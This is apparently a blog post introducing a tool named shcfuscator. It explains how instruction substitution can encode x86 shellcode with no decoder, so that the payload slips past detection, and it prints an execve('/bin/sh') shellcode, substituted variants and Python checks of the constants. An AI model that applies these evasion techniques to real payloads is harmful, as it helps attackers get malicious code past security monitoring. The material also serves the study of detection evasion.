The obvious solution is to encode the payload before sending it. A typical encoder yields a new payload that contains both the encoded original payload and a decoder routine to decode it.
Now the encoded payload is "free" of any malicious patterns, so it won't trigger any alarm. But what about the decoder? It becomes the weakest link and the new trigger for alarms.
Almost every encoding method requires a decoder to be embedded in the payload. The tricky part is encoding the decoder so that it won't trigger any alarm either. Is that even possible?
The short answer is yes. There are a few ways to do it, and one of them is instruction substitution: replacing an instruction with a different but semantically equivalent instruction (or sequence of instructions).
But if instruction substitution is good enough for encoding decoders, isn't it good enough for encoding the payload itself? Yes, it is.
Applying instruction substitution to a payload yields an encoded payload with no decoder in it: a decoderless encoded shellcode.
Let's take the following shellcode (execve "/bin/sh", 23 bytes) as an input:
    .section .text
    .global _start
    _start:
        push $0xb
        popl %eax
        cdq
        push %edx
        push $0x68732f2f
        push $0x6e69622f
        mov %esp, %ebx
        push %edx
        push %ebx
        mov %esp, %ecx
        int $0x80

The first instruction is:
    push $0xb

The goal of this instruction is to store the value 0xB on the stack. One way to encode this instruction is:
    push $0xc
    decb (%esp)

This way, the value (i.e. 0xB) is no longer visible. Another way to encode this instruction is:
    sub $0x4, %esp
    movl $0xfffffff4, (%esp)
    notl (%esp)

Here, the PUSH instruction is no longer visible. The reason I'm using 0xFFFFFFF4 (i.e. -12, or ~0xB) and not 0xB is to avoid NULL bytes, but if NULL bytes are not a problem then:
    sub $0x4, %esp
    movl $0x0000000b, (%esp)

Single instructions are not the only thing that can be encoded. It's also possible to group a few instructions together and encode them as a unit. For example:
    push $0xb
    popl %eax

The goal of this instruction group is to store the value 0x0000000B in register EAX. One way to encode it is:
    movl $0xfff3133c, %eax
    xorl $0xfff31337, %eax

This way, the value (i.e. 0xB, or 0x0000000B) is no longer visible, because it only appears as the XOR of the two constants (0xFFF3133C ^ 0xFFF31337 = 0xB). Another way to encode this instruction group is:
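    pusha
    movl $0xfffffff4, 0x1c(%esp)
    notl 0x1c(%esp)
    popa

Here, neither the referenced register (i.e. EAX) nor the value (i.e. 0xB, or 0x0000000B) is visible. PUSHA saves EAX at offset 0x1C from ESP, so the write lands in the slot that POPA later restores into EAX.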
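The constants in these substitutions are easy to get wrong by hand, so it is worth checking them. The following is a minimal Python sketch, not taken from shcfuscator, that models 32-bit NOT, XOR and a byte-sized decrement with masks. The helper names (`not32`, `decb`, `as_signed32`) are hypothetical and exist only for this illustration.

```python
MASK32 = 0xFFFFFFFF

def not32(value):
    """Model NOTL: bitwise complement truncated to 32 bits."""
    return ~value & MASK32

def decb(value):
    """Model DECB on the low byte of a little-endian dword (upper bytes untouched)."""
    low = (value - 1) & 0xFF
    return (value & 0xFFFFFF00) | low

def as_signed32(value):
    """Interpret a 32-bit pattern as a two's-complement signed integer."""
    return value - (1 << 32) if value & 0x80000000 else value

TARGET = 0x0000000B

# push $0xc ; decb (%esp)
assert decb(0x0000000C) == TARGET
# movl $0xfffffff4, ... ; notl ...
assert not32(0xFFFFFFF4) == TARGET
assert as_signed32(0xFFFFFFF4) == -12
# An XOR-based variant needs two constants whose XOR is the target value.
assert 0xFFF3133C ^ 0xFFF31337 == TARGET
```

If any constant is changed without adjusting its partner, the corresponding assertion fails, which makes this a cheap sanity check before assembling anything.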
The advantage of this approach is that it can be applied recursively: each output can be used as the input for another pass. For example:
    push $0xb

Yields:

    push $0xc
    decb (%esp)

That can yield:

    sub $0x4, %esp
    movl $0xfffffff3, (%esp)
    notl (%esp)
    decb (%esp)

And so on.
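To see that every pass of this chain leaves the same dword on top of the stack, the three forms can be run through a toy interpreter. This is only a sketch under stated assumptions: the operation names (`push`, `sub_esp_4`, `movl_top`, `notl_top`, `decb_top`) are hypothetical stand-ins for the instructions above, and the model tracks the stack value only. It ignores flags, which matters in practice because SUB and DEC modify flags while PUSH does not.

```python
MASK32 = 0xFFFFFFFF

def run(program):
    """Execute a tiny instruction subset and return the dword on top of the stack."""
    stack = []
    for op, *args in program:
        if op == "push":            # push $imm
            stack.append(args[0] & MASK32)
        elif op == "sub_esp_4":     # sub $0x4, %esp
            # Reserves a dword; its contents are undefined on real hardware,
            # modeled here as 0.
            stack.append(0)
        elif op == "movl_top":      # movl $imm, (%esp)
            stack[-1] = args[0] & MASK32
        elif op == "notl_top":      # notl (%esp)
            stack[-1] = ~stack[-1] & MASK32
        elif op == "decb_top":      # decb (%esp), low byte only
            stack[-1] = (stack[-1] & 0xFFFFFF00) | ((stack[-1] - 1) & 0xFF)
        else:
            raise ValueError(f"unsupported operation: {op}")
    return stack[-1]

pass0 = [("push", 0xB)]
pass1 = [("push", 0xC), ("decb_top",)]
pass2 = [("sub_esp_4",), ("movl_top", 0xFFFFFFF3), ("notl_top",), ("decb_top",)]

assert run(pass0) == run(pass1) == run(pass2) == 0xB
```

Checking equivalence after each pass, rather than only at the end, makes it easier to find which substitution broke the chain.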
The disadvantage of this approach is that it's not size-oriented (the output may be larger than the input), and it does not work for every instruction in the instruction set (e.g. INT).
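To put rough numbers on the size cost, the sketch below compares byte lengths for the different forms of `push $0xb` shown earlier and checks each one for NULL bytes. The byte strings are hand-assembled IA-32 encodings and should be treated as an assumption; it is worth confirming them against real assembler output before relying on them. The `report` helper is hypothetical.

```python
# Hand-assembled 32-bit encodings (assumed; verify against your assembler).
ENCODINGS = {
    "push $0xb": bytes.fromhex("6a0b"),
    "push $0xc; decb (%esp)": bytes.fromhex("6a0c" "fe0c24"),
    "sub; movl ~0xb; notl": bytes.fromhex("83ec04" "c70424f4ffffff" "f71424"),
    "sub; movl 0xb": bytes.fromhex("83ec04" "c704240b000000"),
}

def report(encodings):
    """Map each variant to (size in bytes, whether it contains a NULL byte)."""
    return {name: (len(code), b"\x00" in code) for name, code in encodings.items()}

for name, (size, has_null) in report(ENCODINGS).items():
    print(f"{name:28} {size:2d} bytes  NULL bytes: {has_null}")
```

Under these encodings the original instruction is 2 bytes, the first substitution is 5, and the NOT-based one is 13, so each pass trades size for the absence of the original pattern. The plain `movl $0x0000000b` variant is the only one that contains NULL bytes.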
Several years ago I developed and released a Python program called shcfuscator (read: shellcode obfuscator) to automate this very process.
Shcfuscator takes an input assembly program in GAS syntax, substitutes popular instructions, and outputs an assembly program in GAS syntax.
Nothing much happened with it, and I didn't follow up on it until recently, when I thought about it again and decided to write this post.
So, if anybody is interested in porting it to Metasploit as an encoder module, please let me know - I'd be happy to help out!
Following this legacy project, I have decided to open a repository for other legacy projects that I developed in the early to mid 2000s.
The repository can be found at: https://github.com/ikotler/tty64
I am not planning to maintain it, but feel free to fork it nonetheless.